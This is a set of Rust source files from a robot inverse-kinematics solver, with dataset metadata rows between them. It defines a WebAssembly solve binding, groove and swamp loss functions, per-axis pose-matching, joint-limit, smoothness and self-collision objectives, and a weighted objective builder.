/// When `relative` is true, goals are offsets from the initial end-effector
/// pose; otherwise they are absolute world-frame targets.
pub fn solve_position_helper(&mut self, pos_goal: JsValue, quat_goal: JsValue, tolerance: JsValue, relative: bool) -> Array {
    let pos_vec: Vec<f64> = serde_wasm_bindgen::from_value(pos_goal).unwrap();
    let quat_vec: Vec<f64> = serde_wasm_bindgen::from_value(quat_goal).unwrap();
    // Missing tolerance means "no slack" on every DoF of every chain.
    // (This binding was previously declared `mut` without being mutated.)
    let tole_vec: Vec<f64> = if tolerance.is_null() || tolerance.is_undefined() {
        vec![0.0; self.vars.robot.num_chains * 6]
    } else {
        serde_wasm_bindgen::from_value(tolerance).unwrap()
    };
    let mut pos_goals: Vec<Vector3<f64>> = Vec::new();
    let mut quat_goals: Vec<UnitQuaternion<f64>> = Vec::new();
    let mut tolerances: Vec<Vector6<f64>> = Vec::new();
    for i in 0..self.vars.robot.num_chains {
        let pos = Vector3::new(pos_vec[i*3], pos_vec[i*3+1], pos_vec[i*3+2]);
        let quat = UnitQuaternion::from_quaternion(Quaternion::new(quat_vec[i*4], quat_vec[i*4+1], quat_vec[i*4+2], quat_vec[i*4+3]));
        let tole = Vector6::new(tole_vec[i*6], tole_vec[i*6+1], tole_vec[i*6+2], tole_vec[i*6+3], tole_vec[i*6+4], tole_vec[i*6+5]);
        pos_goals.push(pos);
        quat_goals.push(quat);
        tolerances.push(tole);
    }
    let mut out_x = self.vars.xopt.clone();
    // Install the parsed goals into the solver's variable store.
    for i in 0..self.vars.robot.num_chains {
        if relative {
            self.vars.goal_positions[i] = self.vars.init_ee_positions[i] + pos_goals[i];
            self.vars.goal_quats[i] = quat_goals[i] * self.vars.init_ee_quats[i];
        } else {
            self.vars.goal_positions[i] = pos_goals[i].clone();
            self.vars.goal_quats[i] = quat_goals[i].clone();
        }
        self.vars.tolerances[i] = tolerances[i].clone();
    }
    self.groove.optimize(&mut out_x, &self.vars, &self.om, 100);
    self.vars.update(out_x.clone());
    out_x.into_iter().map(JsValue::from).collect()
}
} | rust | MIT | 1c48d2ae408b4e024ee037641aac1e728267984e | 2026-01-04T20:21:47.335665Z | false |
uwgraphics/relaxed_ik_core | https://github.com/uwgraphics/relaxed_ik_core/blob/1c48d2ae408b4e024ee037641aac1e728267984e/src/groove/objective.rs | src/groove/objective.rs | use crate::groove::{vars};
use crate::utils_rust::transformations::{*};
use nalgebra::geometry::{Translation3, UnitQuaternion, Quaternion};
use std::cmp;
use crate::groove::vars::RelaxedIKVars;
use nalgebra::{Vector3, Isometry3, Point3};
use std::ops::Deref;
use time::PreciseTime;
use parry3d_f64::{shape, query};
/// "Groove" loss: a narrow inverted Gaussian well of width `c` centered at
/// `t`, plus a polynomial term `f * (x - t)^g` that keeps the loss growing
/// away from the well.
pub fn groove_loss(x_val: f64, t: f64, d: i32, c: f64, f: f64, g: i32) -> f64 {
    let offset = x_val - t;
    let gaussian_well = (-offset.powi(d) / (2.0 * c.powi(2))).exp();
    let polynomial_tail = f * offset.powi(g);
    polynomial_tail - gaussian_well
}
/// Analytic derivative of `groove_loss` with respect to `x_val`.
pub fn groove_loss_derivative(x_val: f64, t: f64, d: i32, c: f64, f: f64, g: i32) -> f64 {
    let offset = x_val - t;
    let two_c_sq = 2.0 * c.powi(2);
    // d/dx of the inverted Gaussian well.
    let well_grad = (-offset.powi(d) / two_c_sq).exp() * (-(d as f64) * offset / two_c_sq);
    // d/dx of the polynomial tail.
    let tail_grad = (g as f64) * f * offset.powi(g - 1);
    tail_grad - well_grad
}
/// Combination loss: a Gaussian well of width `c` at goal `g`, a quadratic
/// pull toward `g`, and a "swamp" barrier that stays near zero inside
/// [l_bound, u_bound] and rises sharply outside it.
pub fn swamp_groove_loss(x_val: f64, g: f64, l_bound: f64, u_bound: f64, c: f64, f1: f64, f2: f64, f3: f64, p1: i32) -> f64 {
    // Map x_val into [-1, 1] relative to the [l_bound, u_bound] interval.
    let normalized = (2.0 * x_val - l_bound - u_bound) / (u_bound - l_bound);
    // Scale chosen so the barrier reaches 95% of its height at the bounds
    // (exp(-(1/scale)^p1) == 0.05).
    let scale = (-1.0 / 0.05f64.ln()).powf(1.0 / p1 as f64);
    let dist_sq = (x_val - g).powi(2);
    let well = -f1 * (-dist_sq / (2.0 * c.powi(2))).exp();
    let quadratic = f2 * dist_sq;
    let swamp = f3 * (1.0 - (-(normalized / scale).powi(p1)).exp());
    well + quadratic + swamp
}
/// "Swamp" loss: approximately -1 inside [l_bound, u_bound] (flat bottom)
/// and rising steeply outside it, with `p1` controlling wall sharpness.
pub fn swamp_loss(x_val: f64, l_bound: f64, u_bound: f64, f1: f64, f2: f64, p1: i32) -> f64 {
    // Position within the interval mapped to [-1, 1].
    let normalized = (2.0 * x_val - l_bound - u_bound) / (u_bound - l_bound);
    // Same 95%-at-the-bounds scaling as swamp_groove_loss.
    let scale = (-1.0 / 0.05f64.ln()).powf(1.0 / p1 as f64);
    let envelope = 1.0 - (-(normalized / scale).powi(p1)).exp();
    (f1 + f2 * normalized.powi(2)) * envelope - 1.0
}
/// Analytic derivative of `swamp_groove_loss` with respect to `x_val`.
///
/// NOTE(review): the Gaussian and quadratic terms differentiate `x_val`
/// directly, whereas `swamp_groove_loss` itself uses `(x_val - g)`; the two
/// only agree when `g == 0` (which is what the callers in this file pass) —
/// confirm before using this with a nonzero goal `g`.
pub fn swamp_groove_loss_derivative(x_val: f64, g:f64, l_bound: f64, u_bound: f64, c : f64, f1: f64, f2: f64, f3:f64, p1:i32) -> f64 {
    // At the interval midpoint the swamp term's derivative would divide by
    // ~0; return 0 there to avoid the singularity.
    if (2.0 * x_val - l_bound - u_bound).abs() < 1e-8 {
        return 0.0;
    }
    let x = (2.0 * x_val - l_bound - u_bound) / (u_bound - l_bound);
    let b = (-1.0 / (0.05 as f64).ln()).powf(1.0 / p1 as f64);
    - f1 * ( (-x_val.powi(2)) / (2.0 * c.powi(2) ) ).exp() * ((-2.0 * x_val) / (2.0 * c.powi(2)))
    + 2.0 * f2 * x_val
    + f3 / (2.0 * x_val - l_bound - u_bound) * ( 2.0 * (x/b).powi(p1) * p1 as f64 * (- (x/b).powi(p1)).exp())
}
/// Interface implemented by every weighted loss term in the objective.
///
/// `call` evaluates the term given full per-joint frames; `call_lite` is a
/// cheaper variant that only receives the end-effector pose of each chain.
/// The default `gradient`/`gradient_lite` implementations use one-sided
/// (forward) finite differences.
pub trait ObjectiveTrait {
    /// Evaluates the loss for configuration `x`, with `frames` holding the
    /// forward-kinematics result (positions, orientations) per chain.
    fn call(&self, x: &[f64], v: &vars::RelaxedIKVars, frames: &Vec<(Vec<nalgebra::Vector3<f64>>, Vec<nalgebra::UnitQuaternion<f64>>)>) -> f64;
    /// Evaluates the loss using only end-effector poses (one per chain).
    fn call_lite(&self, x: &[f64], v: &vars::RelaxedIKVars, ee_poses: &Vec<(nalgebra::Vector3<f64>, nalgebra::UnitQuaternion<f64>)>) -> f64;
    /// Forward finite-difference gradient of `call`; returns (f(x), grad).
    /// Note the step size here (1e-9) differs from `gradient_lite` (1e-7).
    fn gradient(&self, x: &[f64], v: &vars::RelaxedIKVars, frames: &Vec<(Vec<nalgebra::Vector3<f64>>, Vec<nalgebra::UnitQuaternion<f64>>)>) -> (f64, Vec<f64>) {
        let mut grad: Vec<f64> = Vec::new();
        let f_0 = self.call(x, v, frames);
        for i in 0..x.len() {
            let mut x_h = x.to_vec();
            x_h[i] += 0.000000001;
            // Frames must be recomputed at the perturbed configuration.
            let frames_h = v.robot.get_frames_immutable(x_h.as_slice());
            let f_h = self.call(x_h.as_slice(), v, &frames_h);
            grad.push( (-f_0 + f_h) / 0.000000001);
        }
        (f_0, grad)
    }
    /// Forward finite-difference gradient of `call_lite`.
    fn gradient_lite(&self, x: &[f64], v: &vars::RelaxedIKVars, ee_poses: &Vec<(nalgebra::Vector3<f64>, nalgebra::UnitQuaternion<f64>)>) -> (f64, Vec<f64>) {
        let mut grad: Vec<f64> = Vec::new();
        let f_0 = self.call_lite(x, v, ee_poses);
        for i in 0..x.len() {
            let mut x_h = x.to_vec();
            x_h[i] += 0.0000001;
            let ee_poses_h = v.robot.get_ee_pos_and_quat_immutable(x_h.as_slice());
            let f_h = self.call_lite(x_h.as_slice(), v, &ee_poses_h);
            grad.push( (-f_0 + f_h) / 0.0000001);
        }
        (f_0, grad)
    }
    fn gradient_type(&self) -> usize {return 1} // manual diff = 0, finite diff = 1
}
/// Penalizes the end-effector position error of chain `arm_idx` along a
/// single axis (`axis` in {0,1,2}) of the goal frame, honoring the
/// per-axis tolerance stored in `v.tolerances`.
pub struct MatchEEPosiDoF {
    pub arm_idx: usize,
    pub axis: usize
}
impl MatchEEPosiDoF {
    pub fn new(arm_idx: usize, axis: usize) -> Self {Self{arm_idx, axis}}
}
impl ObjectiveTrait for MatchEEPosiDoF {
    fn call(&self, x: &[f64], v: &vars::RelaxedIKVars, frames: &Vec<(Vec<nalgebra::Vector3<f64>>, Vec<nalgebra::UnitQuaternion<f64>>)>) -> f64 {
        // The chain's last frame is the end effector.
        let last_elem = frames[self.arm_idx].0.len() - 1;
        let goal_quat = v.goal_quats[self.arm_idx];
        // E_{gc} = R_{gw} * T_{gw} * T_{wc} * R_{wc}, R_{wc} won't matter since we are only interested in the translation
        // so we get: T_{gc} = R_{gw} * T_{gw} * T_{wc}
        let T_gw_T_wc = nalgebra::Vector3::new( frames[self.arm_idx].0[last_elem].x - v.goal_positions[self.arm_idx].x,
            frames[self.arm_idx].0[last_elem].y - v.goal_positions[self.arm_idx].y,
            frames[self.arm_idx].0[last_elem].z - v.goal_positions[self.arm_idx].z );
        // Rotate the world-frame error into the goal frame so each axis can
        // be toleranced independently.
        let T_gc = goal_quat.inverse() * T_gw_T_wc;
        let dist: f64 = T_gc[self.axis];
        let bound = v.tolerances[self.arm_idx][self.axis];
        if (bound <= 1e-2) {
            // Tolerance effectively zero: sharp groove well at zero error.
            groove_loss(dist, 0., 2, 0.1, 10.0, 2)
        } else {
            // Finite tolerance: flat "swamp" region inside [-bound, bound].
            swamp_groove_loss(dist, 0.0, -bound, bound, bound*2.0, 1.0, 0.01, 100.0, 20)
        }
    }
    // NOTE(review): unlike `call`, this lite variant ignores `axis` and the
    // tolerance and scores the full position error norm — confirm intended.
    fn call_lite(&self, x: &[f64], v: &vars::RelaxedIKVars, ee_poses: &Vec<(nalgebra::Vector3<f64>, nalgebra::UnitQuaternion<f64>)>) -> f64 {
        let x_val = ( ee_poses[self.arm_idx].0 - v.goal_positions[self.arm_idx] ).norm();
        groove_loss(x_val, 0., 2, 0.1, 10.0, 2)
    }
}
pub struct MatchEERotaDoF {
pub arm_idx: usize,
pub axis: usize
}
impl MatchEERotaDoF {
pub fn new(arm_idx: usize, axis: usize) -> Self {Self{arm_idx, axis}}
}
impl ObjectiveTrait for MatchEERotaDoF {
fn call(&self, x: &[f64], v: &vars::RelaxedIKVars, frames: &Vec<(Vec<nalgebra::Vector3<f64>>, Vec<nalgebra::UnitQuaternion<f64>>)>) -> f64 {
let last_elem = frames[self.arm_idx].1.len() - 1;
let ee_quat = frames[self.arm_idx].1[last_elem];
let goal_quat = v.goal_quats[self.arm_idx];
let rotation = goal_quat.inverse()*ee_quat;
let euler = rotation.euler_angles();
let scaled_axis = rotation.scaled_axis();
// println!("axisAngle: {:?} {:?}", euler, axisAngle);
let mut angle: f64 = 0.0;
angle += scaled_axis[self.axis].abs();
let bound = v.tolerances[self.arm_idx][self.axis + 3];
if (bound <= 1e-2) {
groove_loss(angle, 0., 2, 0.1, 10.0, 2)
} else {
if bound >= 3.14159260 {
swamp_loss(angle, -bound, bound, 100.0, 0.1, 20)
} else {
swamp_groove_loss(angle, 0.0, -bound, bound, bound*2.0, 1.0, 0.01, 100.0, 20)
// swamp_groove_loss(angle, 0.0, -bound, bound, 10.0, 1.0, 0.01, 100.0, 20)
}
}
}
fn call_lite(&self, x: &[f64], v: &vars::RelaxedIKVars, ee_poses: &Vec<(nalgebra::Vector3<f64>, nalgebra::UnitQuaternion<f64>)>) -> f64 {
let x_val = ( ee_poses[self.arm_idx].0 - v.goal_positions[self.arm_idx] ).norm();
groove_loss(x_val, 0., 2, 0.1, 10.0, 2)
}
}
pub struct SelfCollision {
pub arm_idx: usize,
pub first_link: usize,
pub second_link: usize
}
impl SelfCollision {
pub fn new(arm_idx: usize, first_link: usize, second_link: usize) -> Self {Self{arm_idx, first_link, second_link}}
}
impl ObjectiveTrait for SelfCollision {
fn call(&self, x: &[f64], v: &vars::RelaxedIKVars, frames: &Vec<(Vec<nalgebra::Vector3<f64>>, Vec<nalgebra::UnitQuaternion<f64>>)>) -> f64 {
for i in 0..x.len() {
if (x[i].is_nan()) {
return 10.0
}
}
let mut x_val: f64 = 0.0;
let link_radius = 0.05;
let start_pt_1 = Point3::from(frames[self.arm_idx].0[self.first_link]);
let end_pt_1 = Point3::from(frames[self.arm_idx].0[self.first_link+1]);
let segment_1 = shape::Segment::new(start_pt_1, end_pt_1);
let mut start_pt_2 = Point3::from(frames[self.arm_idx].0[self.second_link]);
let mut end_pt_2 = Point3::from(frames[self.arm_idx].0[self.second_link+1]);
let segment_2 = shape::Segment::new(start_pt_2, end_pt_2);
let segment_pos = nalgebra::one();
// println!("start_pt_1:{} end_pt_1:{} start_pt_2:{} end_pt_2:{} x: {:?}", start_pt_1, end_pt_1, start_pt_2, end_pt_2, x);
let dis = query::distance(&segment_pos, &segment_1, &segment_pos, &segment_2).unwrap() - 0.05;
swamp_loss(dis, 0.02, 1.5, 60.0, 0.0001, 30)
}
fn call_lite(&self, x: &[f64], v: &vars::RelaxedIKVars, ee_poses: &Vec<(nalgebra::Vector3<f64>, nalgebra::UnitQuaternion<f64>)>) -> f64 {
let x_val = 1.0; // placeholder
groove_loss(x_val, 0., 2, 2.1, 0.0002, 4)
}
}
// pub struct EnvCollision {
// pub arm_idx: usize
// }
// impl EnvCollision {
// pub fn new(arm_idx: usize) -> Self {Self{arm_idx}}
// }
// impl ObjectiveTrait for EnvCollision {
// fn call(&self, x: &[f64], v: &vars::RelaxedIKVars, frames: &Vec<(Vec<nalgebra::Vector3<f64>>, Vec<nalgebra::UnitQuaternion<f64>>)>) -> f64 {
// // let start = PreciseTime::now();\
// for i in 0..x.len() {
// if (x[i].is_nan()) {
// return 10.0
// }
// }
// let mut x_val: f64 = 0.0;
// let link_radius = v.env_collision.link_radius;
// let penalty_cutoff: f64 = link_radius * 2.0;
// let a = penalty_cutoff.powi(2);
// for (option, score) in &v.env_collision.active_obstacles[self.arm_idx] {
// if let Some(handle) = option {
// let mut sum: f64 = 0.0;
// let obstacle = v.env_collision.world.objects.get(*handle).unwrap();
// let last_elem = frames[self.arm_idx].0.len() - 1;
// for i in 0..last_elem {
// let mut start_pt = Point3::from(frames[self.arm_idx].0[i]);
// // hard coded for ur5
// if (i == last_elem - 1) {
// start_pt = Point3::from(frames[self.arm_idx].0[i] + 0.2 * (frames[self.arm_idx].0[i] - frames[self.arm_idx].0[i + 1]));
// }
// let end_pt = Point3::from(frames[self.arm_idx].0[i + 1]);
// let segment = shape::Segment::new(start_pt, end_pt);
// let segment_pos = nalgebra::one();
// let dis = query::distance(obstacle.position(), obstacle.shape().deref(), &segment_pos, &segment) - link_radius;
// // println!("Obstacle: {}, Link: {}, Distance: {:?}", obstacle.data().name, i, dis);
// sum += a / (dis + link_radius).powi(2);
// }
// // println!("OBJECTIVE -> {:?}, Sum: {:?}", obstacle.data().name, sum);
// x_val += sum;
// }
// }
// // let end = PreciseTime::now();
// // println!("Obstacles calculating takes {}", start.to(end));
// groove_loss(x_val, 0., 2, 3.5, 0.00005, 4)
// }
// fn call_lite(&self, x: &[f64], v: &vars::RelaxedIKVars, ee_poses: &Vec<(nalgebra::Vector3<f64>, nalgebra::UnitQuaternion<f64>)>) -> f64 {
// let x_val = 1.0; // placeholder
// groove_loss(x_val, 0., 2, 2.1, 0.0002, 4)
// }
// }
/// Rewards configurations with high manipulability as reported by the
/// robot model.
pub struct MaximizeManipulability;
impl ObjectiveTrait for MaximizeManipulability {
    fn call(&self, x: &[f64], v: &vars::RelaxedIKVars, frames: &Vec<(Vec<nalgebra::Vector3<f64>>, Vec<nalgebra::UnitQuaternion<f64>>)>) -> f64 {
        let x_val = v.robot.get_manipulability_immutable(&x);
        // Groove well centered at 1.0: loss is lowest when the measure is 1.
        groove_loss(x_val, 1.0, 2, 0.5, 0.1, 2)
    }
    // Not computable from end-effector poses alone: contributes nothing in
    // lite mode.
    fn call_lite(&self, x: &[f64], v: &vars::RelaxedIKVars, ee_poses: &Vec<(nalgebra::Vector3<f64>, nalgebra::UnitQuaternion<f64>)>) -> f64 {
        0.0
    }
}
/// Keeps joint `joint_idx` inside its limits using a swamp loss that is
/// flat in the interior and rises steeply at the bounds.
pub struct EachJointLimits{
    pub joint_idx: usize
}
impl EachJointLimits {
    pub fn new(joint_idx: usize) -> Self {Self{joint_idx}}
}
impl ObjectiveTrait for EachJointLimits {
    fn call(&self, x: &[f64], v: &vars::RelaxedIKVars, frames: &Vec<(Vec<nalgebra::Vector3<f64>>, Vec<nalgebra::UnitQuaternion<f64>>)>) -> f64 {
        // ±999 appears to be the sentinel for an unlimited (continuous)
        // joint — no penalty in that case. TODO(review): confirm against
        // the robot model's limit parsing.
        if v.robot.lower_joint_limits[self.joint_idx] == -999.0 && v.robot.upper_joint_limits[self.joint_idx] == 999.0 {
            return -1.0;
        }
        let l = v.robot.lower_joint_limits[self.joint_idx];
        let u = v.robot.upper_joint_limits[self.joint_idx];
        swamp_loss(x[self.joint_idx], l, u, 10.0, 10.0, 20)
    }
    // Joint limits are independent of end-effector pose; no lite penalty.
    fn call_lite(&self, x: &[f64], v: &vars::RelaxedIKVars, ee_poses: &Vec<(nalgebra::Vector3<f64>, nalgebra::UnitQuaternion<f64>)>) -> f64 {
        0.0
    }
}
/// Penalizes the joint-space step between the candidate configuration and
/// the previous solution (first difference of the trajectory).
pub struct MinimizeVelocity;
impl ObjectiveTrait for MinimizeVelocity {
    fn call(&self, x: &[f64], v: &vars::RelaxedIKVars, frames: &Vec<(Vec<nalgebra::Vector3<f64>>, Vec<nalgebra::UnitQuaternion<f64>>)>) -> f64 {
        // Euclidean norm of (x - xopt), accumulated index-by-index.
        let step_norm = (0..x.len())
            .map(|i| (x[i] - v.xopt[i]).powi(2))
            .sum::<f64>()
            .sqrt();
        groove_loss(step_norm, 0.0, 2, 0.1, 10.0, 2)
    }
    fn call_lite(&self, x: &[f64], v: &vars::RelaxedIKVars, ee_poses: &Vec<(nalgebra::Vector3<f64>, nalgebra::UnitQuaternion<f64>)>) -> f64 {
        let step_norm = (0..x.len())
            .map(|i| (x[i] - v.xopt[i]).powi(2))
            .sum::<f64>()
            .sqrt();
        groove_loss(step_norm, 0.0, 2, 0.1, 10.0, 2)
    }
}
/// Penalizes the change in step size across the last two solutions
/// (second difference of the trajectory).
pub struct MinimizeAcceleration;
impl ObjectiveTrait for MinimizeAcceleration {
    fn call(&self, x: &[f64], v: &vars::RelaxedIKVars, frames: &Vec<(Vec<nalgebra::Vector3<f64>>, Vec<nalgebra::UnitQuaternion<f64>>)>) -> f64 {
        let accel_norm = (0..x.len())
            .map(|i| {
                let step_now = x[i] - v.xopt[i];
                let step_prev = v.xopt[i] - v.prev_state[i];
                (step_now - step_prev).powi(2)
            })
            .sum::<f64>()
            .sqrt();
        groove_loss(accel_norm, 0.0, 2, 0.1, 10.0, 2)
    }
    fn call_lite(&self, x: &[f64], v: &vars::RelaxedIKVars, ee_poses: &Vec<(nalgebra::Vector3<f64>, nalgebra::UnitQuaternion<f64>)>) -> f64 {
        let accel_norm = (0..x.len())
            .map(|i| {
                let step_now = x[i] - v.xopt[i];
                let step_prev = v.xopt[i] - v.prev_state[i];
                (step_now - step_prev).powi(2)
            })
            .sum::<f64>()
            .sqrt();
        groove_loss(accel_norm, 0.0, 2, 0.1, 10.0, 2)
    }
}
/// Penalizes the change in acceleration across the last three solutions
/// (third difference of the trajectory).
pub struct MinimizeJerk;
impl ObjectiveTrait for MinimizeJerk {
    fn call(&self, x: &[f64], v: &vars::RelaxedIKVars, frames: &Vec<(Vec<nalgebra::Vector3<f64>>, Vec<nalgebra::UnitQuaternion<f64>>)>) -> f64 {
        let jerk_norm = (0..x.len())
            .map(|i| {
                let v1 = x[i] - v.xopt[i];
                let v2 = v.xopt[i] - v.prev_state[i];
                let v3 = v.prev_state[i] - v.prev_state2[i];
                ((v1 - v2) - (v2 - v3)).powi(2)
            })
            .sum::<f64>()
            .sqrt();
        groove_loss(jerk_norm, 0.0, 2, 0.1, 10.0, 2)
    }
    fn call_lite(&self, x: &[f64], v: &vars::RelaxedIKVars, ee_poses: &Vec<(nalgebra::Vector3<f64>, nalgebra::UnitQuaternion<f64>)>) -> f64 {
        let jerk_norm = (0..x.len())
            .map(|i| {
                let v1 = x[i] - v.xopt[i];
                let v2 = v.xopt[i] - v.prev_state[i];
                let v3 = v.prev_state[i] - v.prev_state2[i];
                ((v1 - v2) - (v2 - v3)).powi(2)
            })
            .sum::<f64>()
            .sqrt();
        groove_loss(jerk_norm, 0.0, 2, 0.1, 10.0, 2)
    }
}
/// Penalizes the Euclidean distance between the end effector of chain
/// `arm_idx` and its position goal (no per-axis tolerance).
pub struct MatchEEPosGoals {
    pub arm_idx: usize
}
impl MatchEEPosGoals {
    pub fn new(arm_idx: usize) -> Self {Self{arm_idx}}
}
impl ObjectiveTrait for MatchEEPosGoals {
    fn call(&self, x: &[f64], v: &vars::RelaxedIKVars, frames: &Vec<(Vec<nalgebra::Vector3<f64>>, Vec<nalgebra::UnitQuaternion<f64>>)>) -> f64 {
        // The chain's last frame is the end effector.
        let last_elem = frames[self.arm_idx].0.len() - 1;
        let x_val = ( frames[self.arm_idx].0[last_elem] - v.goal_positions[self.arm_idx] ).norm();
        groove_loss(x_val, 0., 2, 0.1, 10.0, 2)
    }
    fn call_lite(&self, x: &[f64], v: &vars::RelaxedIKVars, ee_poses: &Vec<(nalgebra::Vector3<f64>, nalgebra::UnitQuaternion<f64>)>) -> f64 {
        let x_val = ( ee_poses[self.arm_idx].0 - v.goal_positions[self.arm_idx] ).norm();
        groove_loss(x_val, 0., 2, 0.1, 10.0, 2)
    }
}
/// Penalizes the angular distance between the end-effector orientation of
/// chain `arm_idx` and its goal quaternion.
pub struct MatchEEQuatGoals {
    pub arm_idx: usize
}
impl MatchEEQuatGoals {
    pub fn new(arm_idx: usize) -> Self {Self{arm_idx}}
}
impl ObjectiveTrait for MatchEEQuatGoals {
    fn call(&self, x: &[f64], v: &vars::RelaxedIKVars, frames: &Vec<(Vec<nalgebra::Vector3<f64>>, Vec<nalgebra::UnitQuaternion<f64>>)>) -> f64 {
        let last_elem = frames[self.arm_idx].1.len() - 1;
        // q and -q represent the same rotation (quaternion double cover), so
        // measure the displacement to both and keep the smaller angle.
        let tmp = Quaternion::new(-frames[self.arm_idx].1[last_elem].w, -frames[self.arm_idx].1[last_elem].i, -frames[self.arm_idx].1[last_elem].j, -frames[self.arm_idx].1[last_elem].k);
        let ee_quat2 = UnitQuaternion::from_quaternion(tmp);
        let disp = angle_between_quaternion(v.goal_quats[self.arm_idx], frames[self.arm_idx].1[last_elem]);
        let disp2 = angle_between_quaternion(v.goal_quats[self.arm_idx], ee_quat2);
        let x_val = disp.min(disp2);
        groove_loss(x_val, 0., 2, 0.1, 10.0, 2)
    }
    fn call_lite(&self, x: &[f64], v: &vars::RelaxedIKVars, ee_poses: &Vec<(nalgebra::Vector3<f64>, nalgebra::UnitQuaternion<f64>)>) -> f64 {
        // Same double-cover handling as `call`, using the provided EE pose.
        let tmp = Quaternion::new(-ee_poses[self.arm_idx].1.w, -ee_poses[self.arm_idx].1.i, -ee_poses[self.arm_idx].1.j, -ee_poses[self.arm_idx].1.k);
        let ee_quat2 = UnitQuaternion::from_quaternion(tmp);
        let disp = angle_between_quaternion(v.goal_quats[self.arm_idx], ee_poses[self.arm_idx].1);
        let disp2 = angle_between_quaternion(v.goal_quats[self.arm_idx], ee_quat2);
        let x_val = disp.min(disp2);
        groove_loss(x_val, 0., 2, 0.1, 10.0, 2)
    }
}
| rust | MIT | 1c48d2ae408b4e024ee037641aac1e728267984e | 2026-01-04T20:21:47.335665Z | false |
uwgraphics/relaxed_ik_core | https://github.com/uwgraphics/relaxed_ik_core/blob/1c48d2ae408b4e024ee037641aac1e728267984e/src/groove/objective_master.rs | src/groove/objective_master.rs | use crate::groove::objective::*;
use crate::groove::vars::RelaxedIKVars;
/// Weighted sum of objective terms plus the gradient-strategy flags used by
/// the optimizer.
pub struct ObjectiveMaster {
    // Loss terms, summed with the index-aligned weight below.
    pub objectives: Vec<Box<dyn ObjectiveTrait + Send>>,
    pub num_chains: usize,
    // One weight per entry in `objectives`.
    pub weight_priors: Vec<f64>,
    // When true, objectives are evaluated through their `call_lite`
    // variants (end-effector poses only, no full frames).
    pub lite: bool,
    // When true, the whole summed objective is finite-differenced at once
    // rather than per term.
    pub finite_diff_grad: bool
}
impl ObjectiveMaster {
/// Builds the minimal IK objective set: one position-matching and one
/// orientation-matching term per chain, evaluated in "lite" mode with
/// whole-objective finite differencing.
pub fn standard_ik(num_chains: usize) -> Self {
    let mut objectives: Vec<Box<dyn ObjectiveTrait + Send>> = Vec::with_capacity(2 * num_chains);
    let mut weight_priors: Vec<f64> = Vec::with_capacity(2 * num_chains);
    for chain in 0..num_chains {
        objectives.push(Box::new(MatchEEPosGoals::new(chain)));
        objectives.push(Box::new(MatchEEQuatGoals::new(chain)));
        // Both terms carry equal weight.
        weight_priors.push(1.0);
        weight_priors.push(1.0);
    }
    Self{objectives, num_chains, weight_priors, lite: true, finite_diff_grad: true}
}
/// Builds the full RelaxedIK objective set: per-chain position/rotation
/// matching, per-joint limits, smoothness terms (velocity, acceleration,
/// jerk), manipulability, and pairwise self-collision terms.
pub fn relaxed_ik(chain_lengths: &[usize]) -> Self {
    let mut objectives: Vec<Box<dyn ObjectiveTrait + Send>> = Vec::new();
    let mut weight_priors: Vec<f64> = Vec::new();
    let num_chains = chain_lengths.len();
    let mut num_dofs = 0;
    for i in 0..num_chains {
        // Three translational DoFs per chain...
        objectives.push(Box::new(MatchEEPosiDoF::new(i, 0)));
        weight_priors.push(50.0);
        objectives.push(Box::new(MatchEEPosiDoF::new(i, 1)));
        weight_priors.push(50.0);
        objectives.push(Box::new(MatchEEPosiDoF::new(i, 2)));
        weight_priors.push(50.0);
        // ...and three rotational DoFs per chain.
        objectives.push(Box::new(MatchEERotaDoF::new(i, 0)));
        weight_priors.push(10.0);
        objectives.push(Box::new(MatchEERotaDoF::new(i, 1)));
        weight_priors.push(10.0);
        objectives.push(Box::new(MatchEERotaDoF::new(i, 2)));
        weight_priors.push(10.0);
        num_dofs += chain_lengths[i];
    }
    // One joint-limit term per DoF across all chains.
    for j in 0..num_dofs {
        objectives.push(Box::new(EachJointLimits::new(j)));
        weight_priors.push(0.1);
    }
    objectives.push(Box::new(MinimizeVelocity)); weight_priors.push(0.7);
    objectives.push(Box::new(MinimizeAcceleration)); weight_priors.push(0.5);
    objectives.push(Box::new(MinimizeJerk)); weight_priors.push(0.3);
    objectives.push(Box::new(MaximizeManipulability)); weight_priors.push(1.0);
    // Self-collision between every pair of non-adjacent links of each chain.
    for i in 0..num_chains {
        // saturating_sub guards against usize underflow for chains with
        // fewer than 2 links (previously `chain_lengths[i] - 2`).
        for j in 0..chain_lengths[i].saturating_sub(2) {
            for k in j+2..chain_lengths[i] {
                // BUG FIX: the arm index was hard-coded to 0, so multi-chain
                // robots only ever checked self-collision on the first chain.
                objectives.push(Box::new(SelfCollision::new(i, j, k)));
                weight_priors.push(0.01);
            }
        }
    }
    Self{objectives, num_chains, weight_priors, lite: false, finite_diff_grad: false}
}
/// Evaluates the weighted objective, dispatching on the `lite` flag.
pub fn call(&self, x: &[f64], vars: &RelaxedIKVars) -> f64 {
    match self.lite {
        true => self.__call_lite(x, vars),
        false => self.__call(x, vars),
    }
}
/// Evaluates objective and gradient, dispatching on both strategy flags.
pub fn gradient(&self, x: &[f64], vars: &RelaxedIKVars) -> (f64, Vec<f64>) {
    match (self.lite, self.finite_diff_grad) {
        (true, true) => self.__gradient_finite_diff_lite(x, vars),
        (true, false) => self.__gradient_lite(x, vars),
        (false, true) => self.__gradient_finite_diff(x, vars),
        (false, false) => self.__gradient(x, vars),
    }
}
/// Forces whole-objective finite differencing regardless of
/// `finite_diff_grad`, still honoring the `lite` flag.
pub fn gradient_finite_diff(&self, x: &[f64], vars: &RelaxedIKVars) -> (f64, Vec<f64>) {
    match self.lite {
        true => self.__gradient_finite_diff_lite(x, vars),
        false => self.__gradient_finite_diff(x, vars),
    }
}
/// Weighted sum of all objective terms using full FK frames.
fn __call(&self, x: &[f64], vars: &RelaxedIKVars) -> f64 {
    let frames = vars.robot.get_frames_immutable(x);
    self.objectives
        .iter()
        .enumerate()
        .map(|(i, obj)| self.weight_priors[i] * obj.call(x, vars, &frames))
        .sum()
}
/// Weighted sum of all objective terms using end-effector poses only.
fn __call_lite(&self, x: &[f64], vars: &RelaxedIKVars) -> f64 {
    let poses = vars.robot.get_ee_pos_and_quat_immutable(x);
    self.objectives
        .iter()
        .enumerate()
        .map(|(i, obj)| self.weight_priors[i] * obj.call_lite(x, vars, &poses))
        .sum()
}
/// Hybrid gradient over full frames: objectives reporting gradient_type 0
/// (manual diff) supply their own `gradient` result, while gradient_type 1
/// objectives are batched into one forward finite-difference sweep that
/// shares the perturbed FK frames across all of them.
fn __gradient(&self, x: &[f64], vars: &RelaxedIKVars) -> (f64, Vec<f64>) {
    let mut grad: Vec<f64> = vec![0. ; x.len()];
    let mut obj = 0.0;
